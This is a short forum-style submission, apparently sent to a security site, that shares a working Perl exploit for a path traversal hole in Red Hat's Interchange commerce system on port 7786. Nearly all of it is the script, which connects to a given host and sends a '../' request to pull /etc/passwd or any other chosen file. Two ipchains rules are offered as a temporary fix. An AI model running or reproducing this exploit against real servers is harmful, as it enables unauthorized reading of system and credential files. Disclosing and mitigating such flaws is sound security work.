First off, great site ! I appreciate all the work you do. I just wanted to send in a quick and dirty perl script to retrieve any file from a server running RedHat's Interchange commerce system. The temp fix for this can be to use ipchains/iptables to block access to the port from outside the server. /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT /sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY Redhat knows about it and I haven't checked my bugtraq/vuln-dev/fulldiscloser addy's in a few days, so not sure if this is even public or not.. I did not discover it, I have however been using the below script as a way to test if the servers are vulnerable without having to telnet to each one. The is another version (final versiopn actually) that reads the 'targets' from a file, but that's just not really needed. anyone who needs that can add it in themselves.. #!/usr/bin/perl # # decker@n3t.net # http://n3t.net # # grabs the file $thashit from the remote server # using a gaping hole in RH's Interchange # ################ use Socket; $host=$ARGV[0]; $port = 7786; $thashit= "/etc/passwd"; $time = localtime(time); print "Trying to get $thashit from $host\n"; $tcpval = getprotobyname('tcp'); $serverIP = inet_aton($host); $serverAddr = sockaddr_in(80, $serverIP); $protocol_name = "tcp"; $iaddr = inet_aton($host) || die print("Failed to find host: $host"); $paddr = sockaddr_in($port, $iaddr) || die print("Something went wrong ... dieing..."); $proto = getprotobyname('tcp') || die print("Unable to get protocol"); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("Failed to open socket: $!"); connect(SOCK, $paddr) || die print("Unable to connect: $!"); $submit = "GET /../../../../../../..$thashit\n\n"; send(SOCK,$submit,0); @thedata=; #recv(SOCK, $thedata, 10000, undef); close (SOCK); foreach $lin(@thedata) { print "$lin"; } print "\nEOF\n\n";